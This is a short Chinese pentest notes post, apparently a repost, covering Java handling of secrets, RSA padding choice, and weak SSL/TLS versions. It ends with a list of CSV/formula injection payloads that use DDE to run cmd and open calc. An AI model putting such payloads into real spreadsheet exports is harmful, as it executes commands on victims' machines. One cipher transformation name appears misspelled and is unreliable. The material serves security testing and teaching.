自学内容网 自学内容网

【渗透测试】payload记录

Java开发使用char[]代替String保存敏感数据

Java Jvm会提供内存转储功能,当Java程序dump后,会生成堆内存的快照,保存在.hprof后缀的文件中,进而导致敏感信息的泄露。char[]可以在存储敏感数据后手动清零,String对象会永久保存数据,即便被置为空也会保存在内存中,知道垃圾回收机制将其回收。

加密算法的填充

应该使用OAEP模式而不应该使用PKCS1模式。
通常写法如下:

RSA/ECB/OAEPWithSHA-1AndGF1Padding
RSA/ECB/OAEPWithSHA-1AndMGFPadding
RSA/ECB/PKCS1Padding(禁用)

不安全协议/加密套件

  1. SSL/TLS版本:
    • SSL(2.0/3.0) 也可以称为SSLv2/SSLv3
    • TLS(1.0/1.1/1.2/1.3)也可以称TLSv1/TLSv1.1/TLSv1.2/TLSv1.3
  2. 存在的问题
    • SSL2.0
      • 使用MD5作为消息认证码
      • 握手消息未受保护
      • 加密和消息认证使用相同的密钥
    • SSL3.0
      • 数据记录协议受到POODLE攻击
      • 密钥交换时易受中间人攻击
    • TLS1.0
      • 对称加密仅支持RC4和CBC模式

CSV注入

可以使用的payload

=cmd|'/c calc'!A1
+=cmd|'/c calc'!A1
\",=cmd|'/c calc'!A1
",=cmd|'/c calc'!A1
@ABS(cmd|'/c calc'!A1)
-cmd|'/c calc'!A1
xxx, =cmd|'/c calc'!A1
xxx\n =cmd|'/c calc'!A1
xxx;=cmd|'/c calc'!A1

原文地址:https://blog.csdn.net/weixin_43699371/article/details/143661323

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!